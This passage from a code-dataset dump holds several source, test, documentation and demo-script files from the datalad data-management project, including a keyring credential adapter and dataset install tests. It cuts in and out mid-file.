to sort in\n descending order.\n count : int, optional\n Stop iteration after the given number of matches.\n contains : str, optional\n Only list refs which contain the specified commit.\n\n Yields\n ------\n dict with items matching the given `fields`\n\n Raises\n ------\n ValueError\n if no `fields` are given\n\n RuntimeError\n if `git for-each-ref` returns a record where the number of\n properties does not match the number of `fields`\n \"\"\"\n if not fields:\n raise ValueError('no `fields` provided, refuse to proceed')\n fields = ensure_list(fields)\n cmd = [\n \"for-each-ref\",\n \"--format={}\".format(\n '%00'.join(\n '%({})'.format(f) for f in fields)),\n ]\n if points_at:\n cmd.append('--points-at={}'.format(points_at))\n if contains:\n cmd.append('--contains={}'.format(contains))\n if sort:\n for k in ensure_list(sort):\n cmd.append('--sort={}'.format(k))\n if pattern:\n cmd += ensure_list(pattern)\n if count:\n cmd.append('--count={:d}'.format(count))\n\n for line in self.call_git_items_(cmd, read_only=True):\n props = line.split('\\0')\n if len(fields) != len(props):\n raise RuntimeError(\n 'expected fields {} from git-for-each-ref, but got: {}'.format(\n fields, props))\n yield dict(zip(fields, props))\n\n\n#\n# Internal helpers\n#\ndef _get_dot_git(pathobj, *, ok_missing=False, resolved=False):\n \"\"\"Given a pathobj to a repository return path to the .git directory\n\n Parameters\n ----------\n pathobj: Path\n ok_missing: bool, optional\n Allow for .git to be missing (useful while sensing before repo is\n initialized)\n resolved : bool, optional\n Whether to resolve any symlinks in the path, at a performance cost.\n\n Raises\n ------\n RuntimeError\n When ok_missing is False and .git path does not exist\n\n Returns\n -------\n Path\n Path to the (resolved) .git directory. If `resolved` is False, and\n the given `pathobj` is not an absolute path, the returned path will\n also be relative.\n \"\"\"\n dot_git = pathobj / '.git'\n if dot_git.is_dir():\n # deal with the common case immediately, an existing dir\n return dot_git.resolve() if resolved else dot_git\n elif not dot_git.exists():\n # missing or bare\n if (pathobj / 'HEAD').exists() and (pathobj / 'config').exists():\n return pathobj.resolve() if resolved else pathobj\n elif not ok_missing:\n raise RuntimeError(\"Missing .git in %s.\" % pathobj)\n else:\n # resolve to the degree possible\n return dot_git.resolve(strict=False)\n # continue with more special cases\n elif dot_git.is_file():\n with dot_git.open() as f:\n line = f.readline()\n if line.startswith(\"gitdir: \"):\n dot_git = pathobj / line[7:].strip()\n return dot_git.resolve() if resolved else dot_git\n else:\n raise InvalidGitRepositoryError(\"Invalid .git file\")\n raise RuntimeError(\"Unaccounted condition\")\n" }, { "alpha_fraction": 0.5959475636482239, "alphanum_fraction": 0.6094557046890259, "avg_line_length": 27.931034088134766, "blob_id": "d1e89096e42989ee90dc4828a16f66d17876a4e5", "content_id": "3e95b05be18c519e7ec7116794b9c6446eddefa8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2521, "license_type": "permissive", "max_line_length": 106, "num_lines": 87, "path": "/datalad/support/tests/test_json_py.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-; coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport logging\nimport os.path as op\nfrom json import JSONDecodeError\n\nfrom datalad.support.json_py import (\n dump,\n dump2stream,\n load,\n load_stream,\n loads,\n)\nfrom datalad.tests.utils_pytest import (\n assert_in,\n assert_raises,\n eq_,\n swallow_logs,\n with_tempfile,\n)\n\n\n@with_tempfile(content=b'{\"Authors\": [\"A1\"\\xc2\\xa0, \"A2\"]}')\ndef test_load_screwy_unicode(fname=None):\n # test that we can tollerate some screwy unicode embeddings within json\n assert_raises(JSONDecodeError, load, fname, fixup=False)\n with swallow_logs(new_level=logging.WARNING) as cml:\n eq_(load(fname), {'Authors': ['A1', 'A2']})\n assert_in('Failed to decode content', cml.out)\n\n\n@with_tempfile(content=u\"\"\"\\\n{\"key0\": \"a
b\"}\n{\"key1\": \"plain\"}\"\"\".encode(\"utf-8\"))\ndef test_load_unicode_line_separator(fname=None):\n # See gh-3523.\n result = list(load_stream(fname))\n eq_(len(result), 2)\n eq_(result[0][\"key0\"], u\"a
b\")\n eq_(result[1][\"key1\"], u\"plain\")\n\n\ndef test_loads():\n eq_(loads('{\"a\": 2}'), {'a': 2})\n with assert_raises(JSONDecodeError),\\\n swallow_logs(new_level=logging.WARNING) as cml:\n loads('{\"a\": 2}x')\n assert_in('Failed to load content from', cml.out)\n\n\n@with_tempfile(mkdir=True)\ndef test_compression(path=None):\n fname = op.join(path, 'test.json.xz')\n content = 'dummy'\n # dump compressed\n dump(content, fname, compressed=True)\n # filename extension match auto-enabled compression \"detection\"\n eq_(load(fname), content)\n # but was it actually compressed?\n # we don't care how exactly it blows up (UnicodeDecodeError, etc),\n # but it has to blow\n assert_raises(Exception, load, fname, compressed=False)\n\n\n@with_tempfile\ndef test_dump(path=None):\n assert(not op.exists(path))\n # dump is nice and create the target directory\n dump('some', op.join(path, 'file.json'))\n assert(op.exists(path))\n\n\n# at least a smoke test\n@with_tempfile\ndef test_dump2stream(path=None):\n stream = [dict(a=5), dict(b=4)]\n dump2stream([dict(a=5), dict(b=4)], path)\n eq_(list(load_stream(path)), stream)\n" }, { "alpha_fraction": 0.5806878209114075, "alphanum_fraction": 0.6005290746688843, "avg_line_length": 37.79487228393555, "blob_id": "85ac6cfe4746177806946f0e02121d0a1ca81037", "content_id": "ccd14ca2152641a6424b4fac0a44128a9e02772e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1512, "license_type": "permissive", "max_line_length": 87, "num_lines": 39, "path": "/datalad/tests/utils_testdatasets.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\n\nfrom os.path import join as opj\nfrom datalad.distribution.dataset import Dataset\n\ndef _make_dataset_hierarchy(path):\n origin = Dataset(path).create()\n origin_sub1 = origin.create('sub1')\n origin_sub2 = origin_sub1.create('sub2')\n with open(opj(origin_sub2.path, 'file_in_annex.txt'), \"w\") as f:\n f.write('content2')\n origin_sub3 = origin_sub2.create('sub3')\n with open(opj(origin_sub3.path, 'file_in_annex.txt'), \"w\") as f:\n f.write('content3')\n origin_sub4 = origin_sub3.create('sub4')\n origin.save(recursive=True)\n return origin, origin_sub1, origin_sub2, origin_sub3, origin_sub4\n\n\ndef _mk_submodule_annex(path, fname, fcontent):\n ca = dict(result_renderer='disabled')\n # a remote dataset with a subdataset underneath\n origds = Dataset(path).create(**ca)\n (origds.pathobj / fname).write_text(fcontent)\n # naming is weird, but a legacy artifact\n s1 = origds.create('subm 1', **ca)\n (s1.pathobj / fname).write_text(fcontent)\n s2 = origds.create('2', **ca)\n (s2.pathobj / fname).write_text(fcontent)\n origds.save(recursive=True, **ca)\n return origds" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6738682985305786, "avg_line_length": 24.578947067260742, "blob_id": "c9a4534b4fa067e6ed9b4376bc4a59fb9cc5f3b2", "content_id": "1d13e9fdf599e82d0e7f46742a785be2e1e8a9c2", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 972, "license_type": "permissive", "max_line_length": 96, "num_lines": 38, "path": "/docs/source/design/log_levels.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_log_levels:\n\n**********\nLog levels\n**********\n\n.. topic:: Specification scope and status\n\n This specification provides a partial overview of the current\n implementation.\n\n\nLog messages are emitted by a wide range of operations within DataLad. They are\ncategorized into distinct levels. While some levels have self-explanatory\ndescriptions (e.g. ``warning``, ``error``), others are less specific (e.g.\n``info``, ``debug``).\n\nCommon principles\n=================\n\nParenthical log message use the same level\n When log messages are used to indicate the start and end of an operation,\n both start and end message use the same log-level.\n\nUse cases\n=========\n\nCommand execution\n-----------------\n\nFor the :class:`~datalad.cmd.WitlessRunner` and its protocols the following log levels are used:\n\n- High-level execution -> ``debug``\n- Process start/finish -> ``8``\n- Threading and IO -> ``5``\n" }, { "alpha_fraction": 0.6595162749290466, "alphanum_fraction": 0.6605678200721741, "avg_line_length": 37.040000915527344, "blob_id": "5d4d0cc041793cf7f8276c3d74b8ff0ea1fbe7e4", "content_id": "58a7d595a8473468597f4d6e8cbb8f7645fdeb44", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4755, "license_type": "permissive", "max_line_length": 87, "num_lines": 125, "path": "/datalad/support/extensions.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Support functionality for extension development\"\"\"\n\nimport logging\nfrom datalad.interface.common_cfg import (\n _NotGiven,\n _ConfigDefinition,\n definitions as _definitions,\n)\n\n__all__ = ['register_config', 'has_config']\n\nlgr = logging.getLogger('datalad.support.extensions')\n\n\ndef register_config(\n name,\n title,\n *,\n default=_NotGiven,\n default_fn=_NotGiven,\n description=None,\n # yes, we shadow type, this is OK\n type=_NotGiven,\n # for manual entry\n dialog=None,\n scope=_NotGiven,\n ):\n \"\"\"Register a configuration item\n\n This function can be used by DataLad extensions and other client\n code to register configurations items and their documentation with\n DataLad's configuration management. Specifically, these definitions\n will be interpreted by and acted on by the `configuration` command,\n and `ConfigManager.obtain()`.\n\n At minimum, each item must be given a name, and a title. Optionally, any\n configuration item can be given a default (or a callable to compute a\n default lazily on access), a type-defining/validating callable (i.e.\n `Constraint`), a (longer) description, a dialog type to enable manual\n entry, and a configuration scope to store entered values in.\n\n Parameters\n ----------\n name: str\n Configuration item name, in most cases starting with the prefix\n 'datalad.' followed by at least a section name, and a variable\n name, e.g. 'datalad.section.variable', following Git's syntax for\n configuration items.\n title: str\n The briefest summary of the configuration item's purpose, typically\n written in the style of a headline for a dialog UI, or that of an\n explanatory inline comment just prior the item definitions.\n default: optional\n A default value that is already known at the time of registering the\n configuration items. Can be of any type.\n default_fn: callable, optional\n A callable to compute a default value lazily on access. The can be\n used, if the actual value is not yet known at the time of registering\n the configuration item, or if the default is expensive to compute\n and its evaluation needs to be deferred to prevent slow startup\n (configuration items are typically defined as one of the first things\n on import).\n description: str, optional\n A longer description to accompany the title, possibly with instructions\n on how a sensible value can be determined, or with details on the\n impact of a configuration switch.\n type: callable, optional\n A callable to perform arbitrary type conversion and validation of value\n (or default values). If validation/conversion fails, the callable\n must raise an arbitrary exception. The `str(callable)` is used as\n a type description.\n dialog: {'yesno', 'question'}\n A type of UI dialog to use when manual value entry is attempted\n (only in interactive sessions, and only when no default is defined.\n `title` and `description` will be displayed in this dialog.\n scope: {'override', 'global', 'local', 'branch'}, optional\n If particular code requests the storage of (manually entered) values,\n but defines no configuration scope, this default scope will be used.\n\n Raises\n ------\n ValueError\n For missing required, or invalid configuration properties.\n \"\"\"\n kwargs = dict(\n default=default,\n default_fn=default_fn,\n scope=scope,\n type=type\n )\n kwargs = {k: v for k, v in kwargs.items() if v is not _NotGiven}\n if dialog is not None and not title:\n raise ValueError(\"Configuration dialog must have a title\")\n doc_props = dict(title=title)\n if description:\n doc_props['text'] = description\n # dialog is OK to be None, this is not just about UI, even if\n # the key of the internal data structure seems to suggest that.\n # it is also the source for annotating config listings\n kwargs['ui'] = (dialog, doc_props)\n _definitions[name] = _ConfigDefinition(**kwargs)\n\n\ndef has_config(name):\n \"\"\"Returns whether a configuration item is registered under the given name\n\n Parameters\n ----------\n\n name: str\n Configuration item name\n\n Returns\n -------\n bool\n \"\"\"\n return name in _definitions\n" }, { "alpha_fraction": 0.6842105388641357, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 15.285714149475098, "blob_id": "a99b951f5a4b51668418bdf6a61e689e45fbfb81", "content_id": "e28ab91ae066df080d876e3d68bfe045fabce6db", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 114, "license_type": "permissive", "max_line_length": 39, "num_lines": 7, "path": "/.coveragerc", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "[paths]\nsource =\n datalad/\n */datalad/\n[report]\n# show lines missing coverage in output\nshow_missing = True\n" }, { "alpha_fraction": 0.7601068019866943, "alphanum_fraction": 0.7646834254264832, "avg_line_length": 78.48484802246094, "blob_id": "e0cbc504547f054426bd61d401c9e5354b148014", "content_id": "e565f3d02ffc23c769163a004ec6d34e1bfb894b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2622, "license_type": "permissive", "max_line_length": 316, "num_lines": 33, "path": "/docs/casts/basic_search.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "full_title=\"Demo of basic datasets meta-data search using DataLad\"\n#run \"set -eu # Fail early if any error happens\"\n\nsay \"DataLad allows to aggregate dataset-level meta-data, i.e. data describing the dataset (description, authors, etc), from a variety of formats (see http://docs.datalad.org/en/latest/metadata.html for more info).\"\nsay 'In this example we will start from a point where someone who has not used datalad before decided to find datasets which related to \"raiders\" (after \"Raiders of the Lost Ark\" movie) and neuroimaging.'\nsay 'As you will see below, upon the very first invocation of \"datalad search\" command, DataLad will need first to acquire aggregated meta-data for our collection of datasets available at https://datasets.datalad.org and for that it will install that top level super-dataset (a pure git repository) under ~/datalad:'\n( sleep 4; type yes; key Return; ) &\nrun \"datalad search raiders neuroimaging\"\n\nsay '\"search\" searches within current dataset (unless -d option is used), and if it is outside of any it would offer to search within the ~/datalad we have just installed'\n( sleep 4; type yes; key Return; ) &\nrun \"datalad search raiders neuroimaging\"\n\nsay \"To avoid interactive question, you can specify to search within that dataset by using -d /// . And now let's specialize the search to not only list the dataset location, but also report the fields where match was found. This time let's search for datasets with Haxby among the authors\"\nrun \"datalad search -d /// -s author -R haxby\"\nsay \"For convenience let's switch to that directory, and now all result paths to datasets (not yet installed) would be relative to current directory\"\nrun \"cd ~/datalad\"\nrun \"datalad search -s author -R haxby\"\n\nsay \"Instead of listing all matching fields, you could specify which fields to report using -r option (using * would list all of them)\"\nrun \"datalad search -s author -r name -r author Haxby\"\n\nsay \"Enough of searching! Let's actually get all those interesting datasets (for now without all the data) we found.\"\nsay \"We could easily do that by passing those reported path as arguments to datalad install command\"\nrun \"datalad search -s author haxby | xargs datalad install\"\nsay \"and explore what we have got\"\nrun \"datalad ls -Lr . | grep -v 'not installed'\"\nrun \"cat openfmri/ds000105/dataset_description.json\"\nsay \"and get data we are interested in, e.g. all the anatomicals within those installed BIDS datasets\"\nrun \"datalad get -J4 openfmri/ds000*/sub-*/anat\"\nrun \"datalad ls -Lr . | grep -v 'not installed'\"\n\nsay \"Now it is your turn to find some interesting datasets for yourself!\"" }, { "alpha_fraction": 0.5772784352302551, "alphanum_fraction": 0.579168438911438, "avg_line_length": 35.630767822265625, "blob_id": "77c34586f92fb9555e76a34cd86ac1436ee1f697", "content_id": "9c1ac94e10ffe5fdccf800e473f8f71bab7563fc", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4762, "license_type": "permissive", "max_line_length": 97, "num_lines": 130, "path": "/datalad/support/keyring_.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Adapters and decorators for keyrings\n\"\"\"\n\nimport os\nimport logging\nlgr = logging.getLogger('datalad.support.keyring')\n\n\nclass Keyring(object):\n \"\"\"Adapter to keyring module\n\n It also delays import of keyring which takes 300ms I guess due to all plugins etc\n \"\"\"\n def __init__(self, keyring_backend=None):\n \"\"\"\n\n Parameters\n ----------\n keyring_backend: keyring.backend.KeyringBackend, optional\n Specific keyring to use. If not provided, the one returned by\n `keyring.get_keyring()` is used\n \"\"\"\n self.__keyring = keyring_backend\n self.__keyring_mod = None\n\n @property\n def _keyring(self):\n if self.__keyring_mod is None:\n # Setup logging for keyring if we are debugging, although keyring's logging\n # is quite scarce ATM\n from datalad.log import lgr\n import logging\n lgr_level = lgr.getEffectiveLevel()\n if lgr_level < logging.DEBUG:\n keyring_lgr = logging.getLogger('keyring')\n keyring_lgr.setLevel(lgr_level)\n keyring_lgr.handlers = lgr.handlers\n lgr.debug(\"Importing keyring\")\n import keyring\n self.__keyring_mod = keyring\n\n if self.__keyring is None:\n from datalad.log import lgr\n # we use module bound interfaces whenever we were not provided a dedicated\n # backend\n self.__keyring = self.__keyring_mod\n the_keyring = self.__keyring_mod.get_keyring()\n if the_keyring.name.lower().startswith('null '):\n lgr.warning(\n \"Keyring module returned '%s', no credentials will be provided\",\n the_keyring.name\n )\n return self.__keyring\n\n @classmethod\n def _get_service_name(cls, name):\n return \"datalad-%s\" % str(name)\n\n # proxy few methods of interest explicitly, to be rebound to the module's\n def get(self, name, field):\n # consult environment, might be provided there and should take precedence\n # NOTE: This env var specification is outdated and not advertised\n # anymmore, but needs to be supported. For example, it is used with and\n # was advertised for\n # https://github.com/datalad-datasets/human-connectome-project-openaccess\n env_var = ('DATALAD_%s_%s' % (name, field)).replace('-', '_')\n lgr.log(5, 'Credentials lookup attempt via env var %s', env_var)\n if env_var in os.environ:\n return os.environ[env_var]\n return self._keyring.get_password(self._get_service_name(name), field)\n\n def set(self, name, field, value):\n return self._keyring.set_password(self._get_service_name(name), field, value)\n\n def delete(self, name, field=None):\n if field is None:\n raise NotImplementedError(\"Deletion of all fields associated with a name\")\n try:\n return self._keyring.delete_password(self._get_service_name(name), field)\n except self.__keyring_mod.errors.PasswordDeleteError as exc:\n exc_str = str(exc).lower()\n if 'not found' in exc_str or 'no such password' in exc_str:\n return\n raise\n\n\nclass MemoryKeyring(object):\n \"\"\"A simple keyring which just stores provided info in memory\n\n Primarily for testing\n \"\"\"\n\n def __init__(self):\n self.entries = {}\n\n def get(self, name, field):\n \"\"\"Get password from the specified service.\n \"\"\"\n # to mimic behavior of keyring module\n return self.entries[name][field] \\\n if name in self.entries and field in self.entries[name] \\\n else None\n\n def set(self, name, field, value):\n \"\"\"Set password for the user in the specified service.\n \"\"\"\n self.entries.setdefault(name, {}).update({field: value})\n\n def delete(self, name, field=None):\n \"\"\"Delete password from the specified service.\n \"\"\"\n if name in self.entries:\n if field:\n self.entries[name].pop(field)\n else:\n # TODO: might be implemented by some super class if .keys() of some kind provided\n self.entries.pop(name)\n else:\n raise KeyError(\"No entries associated with %s\" % name)\n\n\nkeyring = Keyring()\n" }, { "alpha_fraction": 0.5518697500228882, "alphanum_fraction": 0.5630277395248413, "avg_line_length": 29.14545440673828, "blob_id": "74440d17e1b3be819137e6666e473c64f6165e8e", "content_id": "1df3beebcb44493c90b9aa017082076cc12a67c7", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3316, "license_type": "permissive", "max_line_length": 75, "num_lines": 110, "path": "/datalad/runner/tests/test_exception.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from __future__ import annotations\n\nfrom datalad.tests.utils_pytest import assert_equal\n\nfrom ..exception import (\n CommandError,\n _format_json_error_messages,\n)\n\n\ndef get_json_objects(object_count: int, message_count: int) -> list[dict]:\n return [\n {\n \"success\": index % 2 == 0,\n \"file\": f\"file-{index}\",\n \"note\": f\"note-{index}\",\n \"error-messages\": [\n f\"error-message-{index}-{j}\"\n for j in range(message_count)\n ]\n }\n for index in range(object_count)\n ]\n\n\ndef test_format_error_with_duplicates() -> None:\n\n object_count = 10\n message_count = 3\n\n json_objects = get_json_objects(object_count, message_count)\n failed_object_indices = [\n index\n for index in range(object_count)\n if json_objects[index][\"success\"] is False\n ]\n\n # Check single appearance\n result = _format_json_error_messages(json_objects)\n lines = result.splitlines()\n del lines[0]\n assert_equal(len(lines), len(failed_object_indices) * 4)\n for i, failed_index in enumerate(failed_object_indices):\n # Accommodate for non-consistent message formatting, I don't\n # want to change the formatting because external tools might\n # depend on it.\n if i == 0:\n assert_equal(lines[4 * i], f\"> note-{failed_index}\")\n else:\n assert_equal(lines[4 * i], f\"> note-{failed_index}\")\n for j in range(message_count):\n assert_equal(\n lines[4 * i + 1 + j],\n f\"error-message-{failed_index}-{j}\")\n\n # Check double appearance\n result = _format_json_error_messages(json_objects + json_objects)\n lines = result.splitlines()\n del lines[0]\n assert_equal(len(lines), len(failed_object_indices) * 4)\n\n for i, failed_index in enumerate(failed_object_indices):\n if i == 0:\n assert_equal(lines[4 * i], f\"> note-{failed_index}\")\n else:\n assert_equal(lines[4 * i], f\"> note-{failed_index}\")\n for j in range(message_count - 1):\n assert_equal(\n lines[4 * i + 1 + j],\n f\"error-message-{failed_index}-{j}\")\n j = message_count - 1\n assert_equal(\n lines[4 * i + 1 + j],\n f\"error-message-{failed_index}-{j} [2 times]\")\n\n\ndef test_format_no_errors() -> None:\n json_objects = get_json_objects(1, 3)\n\n result = _format_json_error_messages(json_objects)\n assert_equal(result, \"\")\n\n result = _format_json_error_messages(json_objects + json_objects)\n assert_equal(result, \"\")\n\n\ndef test_command_error_rendering() -> None:\n command_error = CommandError(\n cmd=\"<cmd>\",\n msg=\"<msg>\",\n code=1,\n stdout=\"<stdout>\",\n stderr=\"<stderr>\",\n cwd=\"<cwd>\",\n kwarg1=\"<kwarg1>\",\n kwarg2=\"<kwarg2>\")\n\n result = command_error.to_str()\n assert_equal(\n result,\n \"CommandError: '<cmd>' failed with exitcode 1 under <cwd> [<msg>] \"\n \"[info keys: kwarg1, kwarg2] [out: '<stdout>'] [err: '<stderr>']\"\n )\n\n result = command_error.to_str(False)\n assert_equal(\n result,\n \"CommandError: '<cmd>' failed with exitcode 1 under <cwd> [<msg>] \"\n \"[info keys: kwarg1, kwarg2]\"\n )\n" }, { "alpha_fraction": 0.6303243041038513, "alphanum_fraction": 0.6370590925216675, "avg_line_length": 36.15580749511719, "blob_id": "49f668456e0f00867c526087911c198d020335cb", "content_id": "2741ff962e2140da210a3e2f08027b9fef68f6d0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 39348, "license_type": "permissive", "max_line_length": 110, "num_lines": 1059, "path": "/datalad/distribution/tests/test_install.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test install action\n\n\"\"\"\n\nimport logging\nimport os\nfrom os.path import (\n basename,\n dirname,\n exists,\n isdir,\n)\nfrom os.path import join as opj\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom datalad import cfg as dl_cfg\nfrom datalad.api import (\n create,\n get,\n install,\n)\nfrom datalad.cmd import WitlessRunner as Runner\nfrom datalad.interface.results import YieldDatasets\nfrom datalad.support import path as op\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n IncompleteResultsError,\n InsufficientArgumentsError,\n)\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.network import get_local_file_url\nfrom datalad.tests.utils_testdatasets import (\n _make_dataset_hierarchy,\n _mk_submodule_annex,\n)\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n DEFAULT_REMOTE,\n assert_false,\n assert_in,\n assert_in_results,\n assert_is_instance,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n create_tree,\n eq_,\n get_datasets_topdir,\n integration,\n known_failure_githubci_win,\n known_failure_windows,\n ok_,\n ok_file_has_content,\n ok_startswith,\n put_file_under_git,\n serve_path_via_http,\n skip_if_no_network,\n skip_if_on_windows,\n skip_ssh,\n slow,\n swallow_logs,\n use_cassette,\n usecase,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import (\n Path,\n _path_,\n chpwd,\n getpwd,\n on_windows,\n rmtree,\n)\n\nfrom ..dataset import Dataset\n\n###############\n# Test helpers:\n###############\n\[email protected](\"annex\", [False, True])\n@with_tree(tree={'file.txt': '123'})\n@serve_path_via_http\n@with_tempfile\ndef test_guess_dot_git(path=None, url=None, tdir=None, *, annex):\n repo = (AnnexRepo if annex else GitRepo)(path, create=True)\n repo.add('file.txt', git=not annex)\n repo.commit()\n\n # we need to prepare to be served via http, otherwise it must fail\n with swallow_logs() as cml:\n assert_raises(IncompleteResultsError, install, path=tdir, source=url)\n ok_(not exists(tdir))\n\n Runner(cwd=path).run(['git', 'update-server-info'])\n\n with swallow_logs() as cml:\n installed = install(tdir, source=url)\n assert_not_in(\"Failed to get annex.uuid\", cml.out)\n eq_(installed.pathobj.resolve(), Path(tdir).resolve())\n ok_(exists(tdir))\n assert_repo_status(tdir, annex=annex)\n\n\n######################\n# Test actual Install:\n######################\n\ndef test_insufficient_args():\n assert_raises(InsufficientArgumentsError, install)\n assert_raises(InsufficientArgumentsError, install, description=\"some\")\n assert_raises(InsufficientArgumentsError, install, None)\n assert_raises(InsufficientArgumentsError, install, None, description=\"some\")\n\n# ValueError: path is on mount 'D:', start on mount 'C:\n@known_failure_githubci_win\n@with_tempfile(mkdir=True)\ndef test_invalid_args(path=None):\n assert_raises(IncompleteResultsError, install, 'Zoidberg', source='Zoidberg')\n # install to an invalid URL\n assert_raises(ValueError, install, 'ssh://mars:Zoidberg', source='Zoidberg')\n # install to a remote location\n assert_raises(ValueError, install, 'ssh://mars/Zoidberg', source='Zoidberg')\n # make fake dataset\n ds = create(path)\n # explicit 'source' as a kwarg\n assert_raises(IncompleteResultsError, install, '/higherup.', source='Zoidberg', dataset=ds)\n # or obscure form for multiple installation \"things\"\n assert_raises(IncompleteResultsError, install, ['/higherup.', 'Zoidberg'], dataset=ds)\n # and if just given without keyword arg for source -- standard Python exception\n assert_raises(TypeError, install, '/higherup.', 'Zoidberg', dataset=ds)\n\n\n# This test caused a mysterious segvault in gh-1350. I reimplementation of\n# the same test functionality in test_clone.py:test_clone_crcns that uses\n# `clone` instead of `install` passes without showing this behavior\n# This test is disabled until some insight into the cause of the issue\n# materializes.\n#@skip_if_no_network\n#@use_cassette('test_install_crcns')\n#@with_tempfile(mkdir=True)\n#@with_tempfile(mkdir=True)\n#def test_install_crcns(tdir=None, ds_path=None):\n# with chpwd(tdir):\n# with swallow_logs(new_level=logging.INFO) as cml:\n# install(\"all-nonrecursive\", source='///')\n# # since we didn't log decorations such as log level atm while\n# # swallowing so lets check if exit code is returned or not\n# # I will test both\n# assert_not_in('ERROR', cml.out)\n# # below one must not fail alone! ;)\n# assert_not_in('with exit code', cml.out)\n#\n# # should not hang in infinite recursion\n# with chpwd('all-nonrecursive'):\n# get(\"crcns\")\n# ok_(exists(_path_(\"all-nonrecursive/crcns/.git/config\")))\n# # and we could repeat installation and get the same result\n# ds1 = install(_path_(\"all-nonrecursive/crcns\"))\n# ok_(ds1.is_installed())\n# ds2 = Dataset('all-nonrecursive').install('crcns')\n# eq_(ds1, ds2)\n# eq_(ds1.path, ds2.path) # to make sure they are a single dataset\n#\n# # again, but into existing dataset:\n# ds = create(ds_path)\n# crcns = ds.install(\"///crcns\")\n# ok_(crcns.is_installed())\n# eq_(crcns.path, opj(ds_path, \"crcns\"))\n# assert_in(crcns.path, ds.get_subdatasets(absolute=True))\n\n\n@skip_if_no_network\n@with_tree(tree={'sub': {}})\ndef test_install_datasets_root(tdir=None):\n with chpwd(tdir):\n ds = install(\"///\")\n ok_(ds.is_installed())\n eq_(ds.path, opj(tdir, get_datasets_topdir()))\n\n # do it a second time:\n result = install(\"///\", result_xfm=None, return_type='list')\n assert_status('notneeded', result)\n eq_(YieldDatasets()(result[0]), ds)\n\n # and a third time into an existing something, that is not a dataset:\n with open(opj(tdir, 'sub', 'a_file.txt'), 'w') as f:\n f.write(\"something\")\n\n with assert_raises(IncompleteResultsError) as cme:\n install(\"sub\", source='///')\n assert_in(\"already exists and not empty\", str(cme.value))\n\n\[email protected](\"type_\", [\"git\", \"annex\"])\n@with_tree(tree={'test.dat': \"doesn't matter\",\n 'INFO.txt': \"some info\",\n 'test-annex.dat': \"irrelevant\"})\n@with_tempfile(mkdir=True)\ndef test_install_simple_local(src_repo=None, path=None, *, type_):\n\n src_ds = Dataset(src_repo).create(result_renderer='disabled', force=True,\n annex=(type_ == 